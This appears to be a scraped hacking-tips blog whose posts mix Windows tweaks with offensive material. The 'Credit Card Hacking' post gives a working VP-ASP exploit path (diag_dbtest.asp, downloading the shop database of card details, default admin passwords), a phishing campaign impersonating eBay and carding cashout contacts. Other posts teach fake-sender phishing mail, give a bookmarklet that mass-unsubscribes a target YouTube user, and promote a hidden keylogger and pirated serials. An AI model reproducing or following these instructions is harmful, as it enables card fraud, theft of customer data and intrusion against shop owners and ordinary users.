0 Comments
Posted in Arrangement, Art, Business

6 Tips for Windows 8


Windows 8 is not yet released but it has created quite a hot discussion in the cyber world.Let me give you 6 important tips for windows 8.Windows 8 is mainly made for the touchscreen devices as they seem to be the next big thing.

  • You dont have to use the ribbon interface in the explorer windows 
You can change this in the Computer Configuration.Select "Administrative Templates" "Windows Components" and finally "Windows Explorer". You have to enable  "Start Windows Explorer with the Ribbon minimized.

  • Plenty off new keyboard shortcuts 4 U
 While windows retains the old conventional keyboard shortcuts it has also introduced a sack of new simple keyboard shortcuts.The key "W" will bring up  settings search.Windows and "C" will call up start menu with date and time.Windows and "Q" will bring up the application search. These are only samples of the new shortcuts of this new OS.
  • You can  uninstall programs from the Start Menu 
To uninstall a program you have to right click ion the icon for the program. To get rid of the program you have to select uninstall and click on it a second time.
  •  Bring Back old control panel interface
If you feel uncomfortable to use the new control panel interface just select "More Settings" at the bottom of the screen.You will see an option for selecting the old control panel interface.

  • Login automatically
  Open Run Dialog Box and Type in "netplwiz" to launch the user account controls in 8.Uncheck the option which asks for username and password. Restart your system and automatic login is set.
  • Picture password for account
Instead of the conventional alphanumeric passwords you can use passwords with pictures you choose.You create a series of gestures and save it.The next time you login you draw the same gestures to login.So you dont better make it a hard one and complicated one.
If you have liked this share it with your friends too & give us a thumbs up :)





0 Comments
Posted in Arrangement, Art, Business

Anonumous Email Service


  • You need a free hosting account which supports PHP and SendMail.The best one is x10hosting.com. Create an Account there.
  • Now in a new notepad paste this PHP code .Click here for code
  • Save it everywhere you want as mail.php,then upload it in your host you created(x10hosting)via FTP.
  • Now we are ready.Just go to yourname.x10hosting.com/mail/php and start sending your fake emails.
                       
0 Comments
Posted in Arrangement, Art, Business

Windows Phone 7.5 Denial of Service Attack Vulnerability

A malicious SMS was sent to A windows phone and the message hub was attacked.This had already happened to Android  and Apple.Hackers could get complete control of Apple OS but not of Android.Any way take a look at the video and leave your comments.

0 Comments
Posted in Arrangement, Art, Business

Create your own bootable Windows(XP,VISTA&7)

There are many ways to create.But the method shown below is the easiest one.
To begin you need a pendrive of 2 GB for XP and 4-8 GB pendrive for Vista and 7
--------------------------------------------------------------------------------------------------------

  • Download WintoFlash from here.(Its a brothersoft client you can download the software.For your safety!).
  • Click the Windows Setup transfer wizard and select next.
  • Here you will need to define two paths where the 'Windows File Path' points to the location of the Windows Installation  disk and the USB DRIVE specifies the location of  Pendrive. 



  •  that will be used for creating the bootable installation routine. Click on'Select' and choose an appropiate path for both.
  • Accept the Windows Licence Agreement and click Continue.
  • The warning message will make you feel terrified.Its nothing but just to notify that you are going to format the prndrive.If you have used the wrong one you can change it.
Now you should have crated the file.Now you should have the access ti BIOS and Change bootable Device Priority to USB.You should have started the installation if you have followed the above.......... :)
0 Comments
Posted in Arrangement, Art, Business

Ardamax Tutorial for Hacking




Ardamax Keylogger is an invisible keylogger that records all user activity and saves it to an encrypted log file. The log file can be stored as a text or web page. Use this keylogger to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically.


This invisible spy application is designed for 2000, XP, 2003, Vista and Windows 7.


Keylogger Features:


Email log delivery - keylogger can send you recorded logs through e-mail delivery at set times - perfect for remote monitoring!


FTP delivery - Ardamax Keylogger can upload recorded logs through FTP delivery.
Network delivery - sends recorded logs through via LAN.
Clipboard logging - capture all text copied to the Windows Clipboard.
Invisible mode makes it absolutely invisible to anyone. Ardamax Keylogger is not visible in the task bar, system tray, Windows 2000/XP/2003/Vista/Windows 7 Task Manager, process viewers (Process Explorer, WinTasks etc.), Start Menu and Windows Startup list.
Visual surveillance - periodically makes screenshots and stores the compressed images to log.
Chat monitoring - Ardamax Keylogger is designed to record and monitor both sides of a conversation in following chats:
  1. AIM
  2. Windows Live Messenger 2011
  3. ICQ
  4. Skype
  5. Yahoo Messenger
  6. Google Talk
  7. Miranda
  8. QiP
Security - allows you to protect program settings, Hidden Mode and Log file.
Application monitoring - keylogger will record the application that was in use that received the keystroke!
Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!
Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.
Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.
Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.
It records every keystroke. Captures passwords and all other invisible text.
Other Features:
  1. Windows 2000/2003/XP/Vista/Windows 7 support
  2. Monitors multi-user machines
  3. Automatic startup
  4. Friendly interface
  5. Easy to install




You can download Ardamax Keylogger v3.7 with a serial number from here.


Here is a video tutorial found on You Tube

0 Comments
Posted in Arrangement, Art, Business

FIND Facebook Offline Friends

This time I am writing  a topic that took me ,I think, at least a small percent of Cyber World.
Any way I have been always thinking to figure out my friends who stay offline but are on FB.
To do this you have 2 ways.
1)You must have figured out what I am up to.For those who haven't got even a samll bit of Idea.I can Explain the trick
FB's bar upon your chat list  is the way expand the first frame and keep  a clear idea of the appearing posts.This will give you an idea of friends who are on FB but stand offline.
2)The second way is much simpler but less effective.
Keep all you earlier chat boxes closed and leave chat boxes of your online friends.
Now refreh the page .Keep doing it unless the chat portion takes a bit time to load.Observe carefully.
The chat log on load first time will show a bit of friends on Facebook.Then they will hide offline friends and give you only online friends with green dot.The first time you see some people among those Green Dotted guys.Those are your friends who are on FB but are offline
------------------------------------:)-------------------------------------------------------------------
Hope you will share.....................
0 Comments
Posted in Arrangement, Art, Business

View photos of those who are not your friends



0 Comments
Posted in Arrangement, Art, Business

Lock your Computer Easy


Very useful when you have to leave your system on for some time and you have to go some where else...

Right click on an empty area of the desktop and choose 'new' then 'shortcut.' The create shortcut wizard will open.
In the first text box, type '%windir%\\System32\\rundll32.exe user32.dll,LockWorkStation' and then give your shortcut an appropriate name on the next page, and hit 'finish.'
You will notice that the shortcut you created has a blank icon. To select a more appropriate one, right click on the shortcut and hit 'properties.' In the 'shortcut' tab, click the 'change icon' button.
Else u can simply press the \"window key + l\" to lock your computer.


You can also use the following keyboard shortcuts with a Microsoft Natural Keyboard or any other compatible keyboard that includes the Windows logo key and the Application key.

0 Comments
Posted in Arrangement, Art, Business

Hacking Battlefield 3: Play Without Origin

Origin works primarily the way the well-known “Steam” client works (which is owned by Valve), except the steam client literally pioneered this electronic gaming distribution service almost a decade ago in 2003. Origin literally adds nothing to the table except that it is competing with Steam, and you can only play BF3 through Origin, thus requiring all gamers who already have Steam downloaded on their computers to also download Origin.

Not only this, but BF3 (the game which many consider the flagship for Origin) actually runs out of a browser instead of some type of built-in in-game browser interface that would then allow you to track friends, view performance tracks, and set up matches. Now, the idea of running a game through a browser isn’t that painful (although it is very unattractive); however, considering that you are running origin to start a game that runs through a browser, the word redundant comes to mind. Also, requiring you to be online in order to play a game with a single-player campaign is a bit mind-numbing in and of itself.

Luckily, BF3 and Origin Have Already Been Hacked

No more than two weeks after the game has hit shelves, a group of hackers collectively known as Razor1911 have already hacked the BF3 client and taken Origin out of the equation. Unlike many hacks, this does not actually allow illegal distribution or pirating of the game. It simply gives customers more control over the game they purchased, allowing them to run BF3 without having to open Origin.

In the release notes, Razor1911 state: “This release is dedicated to our fans worldwide who bought this game on legal way and don't want to install the trojan from Electronic Arts to play online.”

Precautions

Do keep in mind that, if you would like to continue playing BF3 online on EA’s servers, there may be some risk involved in running the hack. First off, EA is very likely to respond to the hack directly and nullify its functionality as soon as possible. What would be even direr, however, is if EA bans people who used the hack from their servers. So please keep these risks in mind if you would like to hack BF3.
0 Comments
Posted in Arrangement, Art, Business

Bypass Firewall In your school/office/home

Is your teachers,Manager and your papa rude at you and not allowing you to access Facebook,Orkut or any other  site.Understanding this situation I am giving you another post on how to Bypass your firewall.
The software used here is a small but Powerful.Its Is UltraSurf
What should You Do
  • Download UltraSurf from Here.
  • You will get a zip file with an .exe file.Open it.
  • It should start ultrasurf and connect to server automatically.
  • Even it will open your Internet explorer automatically. Now you can have an unblocked and secure to internet.
  • If you want to use ultrasurf on Firefox, you need to download the firefox plugin too: download here
    If you are connected to internet through a proxy server then ultrasurf will detect it. If somehow it does not detect the proxy server then you can manually enter your proxy server
    To manually enter proxy server
    Click on Option > Proxy Setting > Manual Proxy Settings
  • Note: If you want to use ultrasurf with other applications you need to configure them to use ultrasurf as their proxy client. The Proxy IP address is 127.0.0.1 and the Port is 9666. 












0 Comments
Posted in Arrangement, Art, Business

SMS which destructs.....it self

In this post i will tell you how to send a self deleting SMS to any mobile that is automatically deleted after user reads it.



Basically this technique is called SAFE-TEXT. It's a technique where a message destroys itself after being read. If you want to call it the Data-centric Suicide Message, that's fine too. This is a website that allows you to send such type of sms for free of cost after registering on it. But it has limitation that you can send only 10 SMS a day.

So here's the thing. With Wikileaks on one side and British libel law on the other, there's room for a tool that lets you say what needs to be said, but without it falling into the wrong hands in the process.

What it does is allow you to send an expletive-laden opinion of your boss to a co-worker, or an it's-in-the-public's-interest-to-know-this leak to your friend on the Guardian (or Wired), without it having a chance to be read by said boss, or unsaid MP.

Note: This trick should only work for British mobile network operators.

Here’s how to use it:

  1. To register and activate, text WIRED to 83118 (charged at your standard network rate). You’ll be able to send up to 10 messages daily.
  2. If you’re the sender, the message will show your name and number.
  3. Write your libel-ridden hate speech and hit send.
  4. The receiver will then be sent a text telling them they have been sent a Wired Safe Text with a link to the mobile internet site that hosts your message.
  5. When they click through they will activate Safe Text. They will only have a few seconds to read the text (so don’t make it too long) before it self-destructs.
0 Comments
Posted in Arrangement, Art, Business

Hacking Windows XP

Windows XP, arguably the world's most popular operating system, still has lots of tricks up its sleeve. Today I will show you some hidden rooms, some unknown corners in this column that you never knew existed but wanted to. Without much ado lets login to the wonderful hidden world of Windows XP.

1. Deleting System Softwares

XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.




2. Modify autoplay for different types of CD

Windows XP includes the ability to perform different actions depending on the type of CD you insert into the drive. For example, you could set your system to always respond to CDs containing MP3 files by opening Windows Media Player.

To edit the Autoplay properties: Open 'my computer'. Right click on the drive you wish to set and select 'properties'. Choose the autoplay tab. Use the dropdown box to see the various recognized types of CD and choose appropriate actions for them.


3. Creating a desktop shortcut for locking your pc !

If you use your computer in an area where others may have access to it, and there are things on your system you would rather have kept confidential, locking your desktop when you leave the computer is an essential task. Here's a recipe for a desktop shortcut that will lock your computer in two easy clicks:



Right click on an empty area of the desktop and choose 'new' then 'shortcut.' The create shortcut wizard will open; in the first text box, type '%windir%\System32\rundll32.exe user32.dll,LockWorkStation' and then give your shortcut an appropriate name on the next page, and hit 'finish.'

You will notice that the shortcut you created has a blank icon. To select a more appropriate one, right click on the shortcut and hit 'properties.' In the 'shortcut' tab, click the 'change icon' button.

In the 'look for icons in this file' box, type '%SystemRoot%\system32\SHELL32.dll' then click 'ok' to see a range of icons for your new shortcut. Choose an appropriate icon. Your desktop locking shortcut is now ready for use. Test it out.


4. Creating Shutdown Icon or One Click Shutdown:

Navigate to your desktop. On the desktop, right-click and go to New, then to Shortcut (in other words, create a new shortcut). You should now see a pop-up window instructing you to enter a command line path.
Use this path in "Type Location of the Item"
SHUTDOWN -s -t 01
If the C: drive is not your local hard drive, then replace "C" with the correct letter of the hard drive. Click the "Next" button. Name the shortcut and click the "Finish" button. Now whenever you want to shut down, just click on this shortcut and you’re done.


5. Removing Shared Documents folder From My Computer

Open registry editor by going to Start then Run and entering regedit. Once in registry, navigate to key

HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ My Computer \ NameSpace \ DelegateFolders

You must see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. If you delete this key, you have effectively removed the my shared documents folder.


6. Renaming The Recycle Bin icon:

To change the name of the Recycle Bin desktop icon, click Start then goto Run, write Regedit and press Enter. It opens Registry Editor. Now in Registry Editor go to:

HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}
and change the name "Recycle Bin" to whatever you want (don’t type any quotes).


7. Force windows XP to reboot upon crashing

This registry edit will cause your system to reboot itself automatically upon crashing. This can be useful if you have a reason for keeping your system on 24/7:

Open REGEDIT

Navigate to 'HKEY_LOCAL_MACHINE\SYSTEM
\CurrentControlSet\Control\CrashControl'

Edit the 'AutoReboot' value to '1'


8. Locking the desktop

If you are leaving your computer for a while and do not wish to turn it off, but want to assure that no-one else can use the computer while you are away, locking the desktop is the best option.

By pressing WINDOWSKEY+L, you password protect your system just as if you had logged out or restarted the computer. The advantage is that any programs or processes that were running when you locked the desktop will stay open and running in the background, ready for you to resume work or play.
0 Comments
Posted in Arrangement, Art, Business

Ways of Working and What is Trojan Android


First, how this trojan could be in our phones?
The answer is because the lack of attention to activities related to the Internet. Example in terms of download games or applications.
Then, what was wrong with the game or an application that we have downloaded?
Because the manufacturer Geinimi ‘package’ repeated legal Android applications (especially games) with Trojan Geinimi. Packaging Applications with Android Geinimi Trojan is then redistributed to the sites.
This is how the operations are performed when Geinimi successfully infect your Android phone:
* Send your Android device coordinates
* Send an apparatus Identity (IMEI) and the identity of the SIM card (IMSI)
* Download and ask users to install an application
* Ask the user for a number of applications to remove
* Registration and details of programs installed on a remote server
So, what solutions or suggestions on how to avoid Geinimi Trojan?
* Download the application only from a trusted application store. Earlier Check the name of the application developers and product reviews.
* Check the permissions to request an application. Make sure that the requested access rights in accordance with the above functions.
* Note the “code” your Android phone. The phone is infected with malware is usually funny as menelpun act or automatically via SMS to recipients who are not familiar and mysterious application that is installed without your knowledge.
* If your phone is found to behave erratically, it is advisable to install security applications on your phone to check.
Be very careful friends ^ ^
0 Comments
Posted in Arrangement, Art, Business

How To Activate Timeline In Facebook Before others Get It

0 Comments
Posted in Arrangement, Art, Business

Keyscrambler to protect You

I have earlier posted about how to hack anyone's email account with keyloggers.When you study an attack method then you have to study the defense attack for that.There is a chance for yourself getting attacked.In this post I will show you how to protect yourself.
KeyScrambler can display a small overlay window on top of your browser screen that verifies that your keystrokes are being encrypted. The program is very easy to use and protects you automatically whenever you launch your browser. KeyScrambler Personal only works with Internet Explorer, Firefox and Flock, there are optional Pro versions available that offer support for additional browsers and other applications.
Anti keylogger protection for your browser
 1. Download Keyscrambler software

2. Run "KeyScramblerPro_Setup.exe" file on your computer and complete installation. Restart your computer to allow Keyscrambler to start its working.

3. On restart, Keyscrambler will ask for Registration information. Read "Top Sites to Find All The Serials You Need" or "How To Get Cracks and Serials to Any Program using Craagle" to find a serial number for Keyscrambler, enter information and hit "Verify".You have those articles on the site itself.
4. Thats it. Now, Keyscrambler application will start encrypting your typed keystrokes on your computer thus, protecting you from invisible keyloggers. To check its working, simply go to say www.gmail.com and enter will email id-password. You will see Overlay Window at top left showing the encrypted value of your typed keystrokes.

What's more, KeyScrambler provides protection without getting in your way. You don't have anything to learn about the program and you don't have to do anything differently, but with KeyScrambler your important personal information will be a whole lot safer.
0 Comments
Posted in Arrangement, Art, Business

Lower Someones Subscription Count

YouTube is the largest video-sharing website on which users can upload, share, and view videos. When you subscribe to someone, you are constantly updated on which of your favorites (the people you subscribe to) has uploaded a new video. That way, you don't have to constantly search for their username, you just have a convenient list of the tubers you like the best. But there are users that are paying for great promotion on their videos on YouTube, and they are getting a lot of subscriber, which in fact they don't deserve to have it. So here i will show you how to lower someone's subscription count on YouTube. It's very simple method, but totally worth it.
LETS START
  1. You have to subscribe to them. Next, enter this code into the address bar:                                           javascript:function unsubscribe() { httpreq=new XMLHttpRequest(); httpreq.open('post', '/ajax_subscriptions?edit_subscription=newsub&username='+username+'&subscription_level=unsubscribe', false); httpreq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); httpreq.send('session_token='+yt.getConfig('SUBSCRIBE_AXC')); if(!httpreq.responseXML) { setTimeout('unsubscribe()', timeout); return; } if(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue!='<h2>You have successfully unsubscribed.</h2>') { alert(httpreq.responseXML.getElementsByTagName('html_content')[0].childNodes[0].nodeValue); } else if((window.status=++count)!=times) { setTimeout('unsubscribe()', timeout); } else { alert('DUN'); } } count=0; if((username=prompt('enter target\'s username', 'Fred'))!=null) { if(!isNaN(timeout=parseInt(prompt('enter timeout in milliseconds', 250)))) { if(!isNaN(times=parseInt(prompt('enter num of times to unsubscribe (0 = unlimited)', 0)))) { unsubscribe(); } } } void(0);
 That's it.
BE HAPPY :)



0 Comments
Posted in Arrangement, Art, Business

Fake Emailer :- Send fake emails

Phishing is one of the most useful and simple methods for hacking email accounts. When using phishing you need to send an email to your victim that contains the link to your phisher page. The victim will click on this link only if he finds the mail genuine, so we need a fake mailer to make this mail appear genuine.

In this post i will show you how to send anonymous email to your victim using Fake Mailer.

1. Go to Fake Mailer website to send anonymous email.



2. Now, enter the information as shown:

From Name: The Sender name which will appear on Email
From Email: The sender Email address
To: Victim email address
Subject: Subject of the Email
Content-type: Select text/html
Text: The content of your mail. Put something which will make your victim to click on your phisher link.

3. Now, enter captcha and hit on Send.

4. Your victim will receive mail like this:



This Fake Mailer is pretty easy to use and also very handy to send anonymous email to your friend or victim.
0 Comments
Posted in Arrangement, Art, Business

Credit Card Hacking

Hi there. This is my first serious "black hat hacking" post of credit cards hacking. Here will be explained all methods used to hack credit cards and bank accounts with lots of $$ it. Now I'm sure most of you think that this is fake or scam, but i want to just tell u this is real and the only working method (in my opinion) to hack a credit card and make your wish come true (lol, hope it doesn't sound like a commercial).



This tutorial is divided in two parts.
  1. Introduction into Credit Cards
  2. Credit card Hacking

Note: Hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.

Lets start with some easy terms.

What is credit card ?

Credit cards are of two types:
  • Debit Card
  • Credit Card
1. Debit means u have a sum of amount in it and u can use them.
2. Credit means u have a credit line limit like of $10000 and u can use them and by the end of month pay it to bank.

To use a credit card on internet u just not need cc number and expiry but u need many info like :
  • First name
  • Last name
  • Address
  • City
  • State
  • Zip
  • Country
  • Phone
  • CC number
  • Expiry
  • CVV2 ( this is 3digit security code on backside after signature panel )
If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).

If u want to make money $ through hacking then you need to be very lucky... you need to have a exact bank and bin to cash that credit card through ATM machines.

Let me explain how ?

First study some simple terms.

BINS = first 6 digit of every credit card is called " BIN " (for example cc number is : 4121638430101157 then its bin is " 412163 "), i hope this is easy to understand.

Now the question is how to make money through credit cards. Its strange..., well you cant do that, but there is specific persons in world who can do that. They call them selves " cashiers ". You can take some time to find a reliable cashiers.

Now the question is every bank credit cards are cashable and every bin is cashable? Like citibank, bank of america , mbna .. are all banks are cashables ? Well answer is " NO ". If u know some thing, a little thing about banking system, have u ever heard what is ATM machines? Where u withdraw ur cash by putting ur card in.
Every bank don't have ATM, every bank don't support ATM machines cashout. Only few banks support with their few bins (as u know bin is first 6 digit of any credit / debit card number), for suppose bank of america. That bank not have only 1 bin, that bank is assigned like, 412345 412370 are ur bins u can make credit cards on them. So bank divide the country citi location wise, like from 412345 - 412360 is for americans, after that for outsiders and like this. I hope u understand. So all bins of the same bank are even not cashable, like for suppose they support ATM in New York and not in California, so like the bins of California of same bank will be uncashable. So always make sure that the bins and banks are 100% cashable in market by many cashiers.

Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don't send your 50% share back.
You can also find some cashiers on mIRC *( /server irc.unixirc.net:6667 ) channel : #cashout, #ccpower

Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don't need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.

Credit Card Hacking

CC (Credit Cards) can be hacked by two ways:
  • Credit Card Scams ( usually used for earning money , some times for shopping )
  • Credit Card Shopadmin Hacking ( just for fun, knowledge, shopping on internet )
1. Shopadmin Hacking

This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don't give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.

Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.

I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.

Below I'm posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and comapny secrets.

Lets start:

Type: VP-ASP Shopping Cart
Version: 5.00

How to find VP-ASP 5.00 sites?

Finding VP-ASP 5.00 sites is so simple...

1. Go to google.com and type: VP-ASP Shopping Cart 5.00
2. You will find many websites with VP-ASP 5.00 cart software installed

Now let's go to the exploit..

The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
Now you need to do this: ****://***.victim.com/shop/diag_dbtest.asp

A page will appear contain those:
  • xDatabase
  • shopping140
  • xDblocation
  • resx
  • xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe r
Example:

The most important thing here is xDatabase
xDatabase: shopping140

Ok, now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb

If you didn't download the Database, try this while there is dblocation:
xDblocation
resx
the url will be: ****://***.victim.com/shop/resx/shopping140.mdb

If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb

Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com, or use MS Office Access.
Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.

The admin login page is usually located here: ****://***.victim.com/shop/shopadmin.asp

If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:
Username: admin
password: admin
OR
Username: vpasp
password: vpasp


2. Hacking Through Scams

This method is usually used to hack for earning money. What happens in this method is you create a clone page.

Target: its basically eBay.com or paypal.com for general credit cards, or if u want to target any specific cashable bank like regionbank.com then u have to create a clone page for that bank.

What is eBay.com?

Its a shopping site world wide which is used by many of billion people which use their credit cards on ebay. What you do make a similar page same as eBay and upload it on some hosting which don't have any law restrictions, try to find hosting in Europe they will make your scam up for long time, and email the users of eBay.

How to get the emails of their users?

Go to google.com and type "Email Harvestor" or any Email Spider and search for eBay Buyers and eBay Sellers and u will get long list. That list is not accurate but out of 1000 atleast 1 email would be valid. Atleast you will get some time.

Well u create a clone page of ebay, and mail the list u create from spider with message, like "Your account has been hacked" or any reason that looks professional, and ask them to visit the link below and enter your info billing, and the scam page have programming when they enter their info it comes directly to your email.
In the form page u have PIN required so u also get the PIN number through which u can cash through ATM ..

Now if u run ebay scam or paypal scam, its up to your luck who's your victim. A client of bank of america or of citibank or of region, its about luck, maybe u get cashable, may be u don't its just luck, nothing else.

Search on google to download a scam site and study it !

After you create your scam site, just find some email harvestor or spider from internet (download good one at Bulk Email Software Superstore - Email Marketing Internet Advertising) and create a good email list.

And you need to find a mailer (mass sending mailer) which send mass - emails to all emails with the message of updating their account on ur scam page ). In from to, use email eBay@reply3.ebay.com and in subject use : eBay - Update Your eBay Account and in Name use eBay

Some Instructions:

1. Make sure your hosting remains up or the link in the email u will send, and when your victim emails visit it, it will show page cannot be displayed, and your plan will be failed.
2. Hardest point is to find hosting which remains up in scam. even i don't find it easily, its very very hard part.
3. Maybe u have contacts with someone who own hosting company and co locations or dedicated he can hide your scam in some of dedicated without restrictions.
4. Finding a good email list (good means = actually users)
5. Your mass mailing software land the emails in inbox of users.


That's all folks. Hope you will find this tutorial useful. And remember, hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial.
0 Comments
Posted in Arrangement, Art, Business

Facebok Blaster Pro

Previously i've posted How to Hack Facebook Password. In this article i want to show you a software FaceBook Blaster Pro which can perform mass friend requests, mass messages, mass comments and mass pokes. I tryed this tool few days ago and i can't say any bad words for it, it's graet.

Here are some key features of FaceBook Blaster Pro:
  • Auto Mass Friend Requests
  • Auto Mass Friend Messages
  • Auto Mass Friend Wall Poster
  • Auto Mass Friend Poker
  • Auto Mass Amber Alerts
  • Auto Mass Captcha Bypass
FaceBook Blaster Pro is the internets favorite Facebook friend adder marketing software tool. Internet marketers are experiencing a gold rush of web 3.0 FREE advertising to highly targeted leads on the fastest growing social network Facebook. With Facebook blaster you will be able to run your marketing efforts on autopilot because automation is key to your success. FaceBook Blaster can perform mass friend requests, mass messages, mass comments and mass pokes.

  • Download FaceBook Blaster Pro Trial Version and enter this serial number to activate the full version:

    12F45F7890F23456F



    If this serial stoped working you can search for another.The articles are on the site itself.You have to just search for it.
0 Comments
Posted in Arrangement, Art, Business

Google Apps Hax



Can Google applications really become an alternative to the venerable Microsoft Office suite? Conventional wisdom may say no, but practical wisdom says otherwise. Right now, 100,000 small businesses are currently running trials of Google office applications. So are large corporations such as General Electric and Proctor & Gamble. Google Apps Hacks gets you in on the action with several ingenious ways to push Google's web, mobile, and desktop apps to the limit.
The scores of clever hacks and workarounds in this book help you get more than the obvious out of a whole host of Google's web-based applications for word processing, spreadsheets, PowerPoint-style presentations, email, calendar, and more by giving you ways to exploit the suite's unique network functionality. 
Download here